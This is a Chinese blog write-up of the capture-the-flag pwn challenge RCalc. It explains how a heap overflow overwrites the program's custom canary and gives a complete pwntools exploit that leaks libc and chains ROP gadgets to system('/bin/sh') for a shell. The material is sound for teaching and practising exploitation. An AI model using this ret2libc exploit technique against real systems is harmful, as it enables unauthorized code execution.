攻防世界pwn RCalc

最新推荐文章于 2022-03-21 21:05:54 发布
最新推荐文章于 2022-03-21 21:05:54 发布
阅读量440 收藏
点赞数 1
分类专栏: pwn ROP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43986365/article/details/104447712
版权
pwn 同时被 2 个专栏收录
19 篇文章 1 订阅
订阅专栏
ROP
5 篇文章 0 订阅
订阅专栏
需要知识:ROP,堆溢出

在这里插入图片描述

发现查询没开PIE和canary。
在这里插入图片描述

程序在最开始申请了几个堆空间,并不允许我们自己申请,而且整个程序并没有free的地方,所以常规的堆漏洞并不容易利用,这时候我们就继续往下看。
在这里插入图片描述

这里可以看到,主要功能函数处有一个没有输入限制的字符串,由此我们就联想到使用常规的ROP。

在这里插入图片描述

但是程序在主要功能函数中添加了随机数植入,构造了一个自定义的canary,我们只要覆盖了这个随机数我们的程序退出时就会报错。
canary取值
在这里插入图片描述

不同就会报错
在这里插入图片描述

这样我们利用ROP也就变的不是非常简单了,我们就需要泄露这个值或者覆盖这个值看看。
我们发现这个值存在我们存储数据的堆中,而我们的堆添加数据好像并没有限制:
在这里插入图片描述

这样我们就可以覆盖程序的自定义canary了,这里我们动态调试一下。
在这里插入图片描述

我们找到了我存储数据的地址,并且也找到了程序的自定义canary存储的地址,算一下距离:
在这里插入图片描述

相差272 bytes,我们存储数据的方式是8 bytes一存,所以算偏移要除以八,272 / 8 = 34 = 0x22
所以我们只需要构造0x22次保存数据记录就可以覆盖自定义canary为我们想要的值了。

exp:

#! /usr/bin/env python
from pwn import *

local = 1
if local:
    p = process('./RCalc')
else:
    p = remote('111.198.29.45',*****)

debug = 1
if debug:
    context.log_level = 'debug'

elf = ELF('./RCalc')
libc = ELF('./libc.so.6')
prdi = 0x0000000000401123
main = 0x401036

def setcanary():
    for i in range(34):
        p.sendlineafter('Your choice:', '1')
        p.sendlineafter('input 2 integer: ', '0')
        p.sendline('1')
        p.sendlineafter('Save the result? ', 'yes')
    p.sendlineafter('Your choice:', '1')
    p.sendlineafter('input 2 integer: ', '0')
    p.sendline('0')
    p.sendlineafter('Save the result? ', 'yes')

printf_plt = elf.symbols['printf']
libc_s_m_got = elf.got['__libc_start_main']
canary = 0
p.recvuntil('Input your name pls: ')
payload = 'a' * 0x108 + p64(canary) + 'a' * 0x8 + p64(prdi) + p64(libc_s_m_got) + p64(printf_plt) + p64(main)
p.sendline(payload)
setcanary()
#gdb.attach(p)
#pause()
p.sendlineafter('Your choice:', '5')

libc_s_m_addr = u64(p.recv(6).ljust(8,'\x00'))
print hex(libc_s_m_addr)
offset = libc_s_m_addr - libc.symbols['__libc_start_main']
system_addr = libc.symbols['system'] + offset
bin_sh = libc.search('/bin/sh').next() + offset

payload = 'a' * 0x108 + p64(canary) + 'a' * 0x8 + p64(prdi) + p64(bin_sh) + p64(system_addr) + p64(main)

p.sendlineafter('Input your name pls: ', payload)
setcanary()
p.sendlineafter('Your choice:', '5')

p.interactive()
PLpa、
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Rcalc(xctf)
weixin_43868725的博客
08-30 344
0x0 程序保护和流程 保护: 流程: main() init_heap() qword_6020F8存放着第一个申请的chunk,qword_6020F0存放着第二个申请的chunk,*(qword_6020F8+8)存放着第三个申请的chunk,*(qword_6020F0+8)存放着第四个申请的chunk real_main() 程序没有开启canary保护,但是通过create_random()和get_random()实现了canary的功能。在输入name的时候没有限制长度,存在栈溢出。
攻防世界PWN之RCalc题解
seaaseesa的博客
11-19 1372
RCalc 首先,检查一下程序的保护机制,还不错,只开了NX 然后,我们用IDA分析 看到这,感觉像是堆的题,应该会很复杂。然而,我们再看看其他地方,发现这个函数只是在初始化时调用的,也不太可能会被利用,而且程序全程没有调用free函数 然后,我们瞧瞧其他函数,看到这里感觉好复杂,然而,它只是一个用来生成随机数的函数罢了 然后,我们继续看其他函数 这个样子,好像是can...
攻防世界 newbie_calc
qq_42882717的博客
11-26 218
//#include<iostream> #include<stdio.h> //using namespace std; int sub_401100(int a, int b) { return a * b; } int sub_401000(int a, int b) { return a + b; } int sub_401220(int a, int b) { return a - b; } int main() { int v3; // eax int ...
攻防世界PWNcalc2题解
seaaseesa的博客
12-12 1049
calc2 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,发现libc被静态编译进了程序中,又由于没有开启PIE,,所以,我们就直接可以获得需要的函数的地址。然而,我们发现,system、execve这些函数都没有,有没有one_gadget,那么我们只能通过系统调用来构造ROP执行/bin/sh来getshell 发现,该程序是一个四则运算表达式计算程序 其中,我...
攻防世界 Pwn welpwn
MrTreebook的博客
12-25 2505
攻防世界 Pwn welpwn1.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 没有canary 没有PIE 3.IDA分析 main函数中有一个可以输入的地方,但是不能溢出 接着往下看 在eho函数中,缓冲区至分配了0x10大小,但是传入的buf有0x400字节,因此可以看出存在溢出 不过拷贝遇到\x00就停止了,这个时候我们只能注入一个返回地址。 但是在ROPgadget里面能找到一个特殊的gadget,它就是破题的关键 我们
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
2024NKCTF-pwn
最新发布
03-25
2024NKCTF_pwn
攻防世界 welpwn WP
Zarcs_233的博客
01-29 908
这道题出的确实很wel 拿到这题,查看保护 发现shellcode走不通,一般都是走rop路线 IDA打开,分析代码,发现main函数内调用了echo函数 这里的buf有0x400大,但是main不存在栈溢出,继续点开echo 这里我们发现有一个赋值的过程,但是a1也就是buff有0x400,而s2只有0x10字节。 很明显,复制过程中存在栈溢出,但是我一开始没发现这一点,那就是这个赋值的终止...
攻防世界-PWN进阶区-welpwn(RCTF-2015)
weixin_44145820的博客
02-27 1033
题目分析 首先看一下开了哪些保护 因为开了NX,所以考虑使用ROP或者return-into-libc 用IDApro分析一下源代码 可以看出main函数中不存在注入点,我们看一下echo函数 在eho函数中,缓冲区至分配了0x10大小,但是传入的buf有0x400字节,因此可以看出存在溢出 不过拷贝遇到\x00就停止了,这个时候我们只能注入一个返回地址。 但是在ROPgadget里面能找到...
攻防世界高手进阶区 ——Welpwn
weixin_62675330的博客
03-21 827
攻防世界高手进阶区 ——Welpwn 分析文件 checksec分析 coke@ubuntu:~/桌面/CTFworkstation/OADW/welpwn$ checksec welpwn [*] '/home/coke/桌面/CTFworkstation/OADW/welpwn/welpwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX e
PWN系列】攻防世界pwn进阶区welpwn分析
Vicl1fe的博客
10-11 457
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 分析 下载文件直接拖入ida分析。开了NX保护,一般就是rop 函数代码也比较简单。read那里也不存溢出。都是0x400。 紧接着调用了echo函数。 在echo函数中,将大小为0x400的buf中的值复制给大小为0x10的s2,。很明显会造成溢出。唯一的问题就是,如果Buf中含有\x00。会中断循环。 函数运行的整体流程就是,用户输入的字符串会存放到buf中,在echo函数中,将buf复制到s2时造成了溢出。通过循
[XCTF-pwn] 30_xctf-3rd-RCTF-2017_rcalc
weixin_52640415的博客
03-09 215
程序本身有溢出,未开pie,got表可写。但是calc有密码校验。 数据结构: 两个0x20块存计数器和指针 0x110块存输入数据 0x330块存使用的密码每次向后加一个提前放入 漏洞: 指针下边界无限制可溢出写,每次会写入输入的数据,通过输入超过33个数覆盖密码区。 思路: 先溢出写入rop 向前移动输入块,清密码1(返回时候用) 选择退出,这时与当前密码指针重叠,可以绕过检查 退出后执行rop得到libc并重入 同1-4写入system(/bin/sh) 完整ex...
RCTF-RCalc WP
qq_41252520的博客
07-28 587
保护 分析 IDA分析代码,部分函数名经过我的分析已被重置 这部分函数主要就是申请了两个,我称之为calc的结构,并给该结构中的buf成员申请空间。 这个函数很明显存在栈溢出,值得注意的是scanf("%s",v1)是以空格作为输入结束的标志,并且作者刻意实现了自定义的canary保护。在一开始随机一个数,存放在answer中,在尾部又从前面申请的calc结构中取出来进行对比 ...
攻防世界——pwn_forgot
syk的博客
05-28 1701
checksec gdb -q ./forgot start i r exp: `#!/usr/bin/env python coding=utf-8 from pwn import * context(arch = ‘i386’, os = ‘linux’) r = remote(‘111.198.29.45’, 32048) overflow = "A"63 addr = 0x080486c...
攻防世界)(pwn)mary_mroton
PLpa的博客
07-20 838
经过一段时间的研究,终于接触到Canary了,不容易啊 拿到本题查看保护 开了NX和Canary两种栈保护,我们运行一下出现,看一下程序逻辑: 根据我们对英语强大的理解 (翻译软件的腻量)我们可以看到1标题是栈溢出漏洞函数,2是格式字符串漏洞函数,3为退出,既然他都告诉我们了,我们也不用客气直接用就可以了。 我们可以用格式字符串漏洞泄露Canary的值,然后再进行简单的栈溢出,把Canary填...
攻防世界PWN之Supermarket题解
seaaseesa的博客
11-15 2235
Supermarket 首先,看一下程序的保护机制。看起来还不错 然后,我们用IDA分析一下 分析出程序大概有这样的一个结构体 typedefstructNode{ charname[16]; intprice; intdescription_size; char*description; }Node;...
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值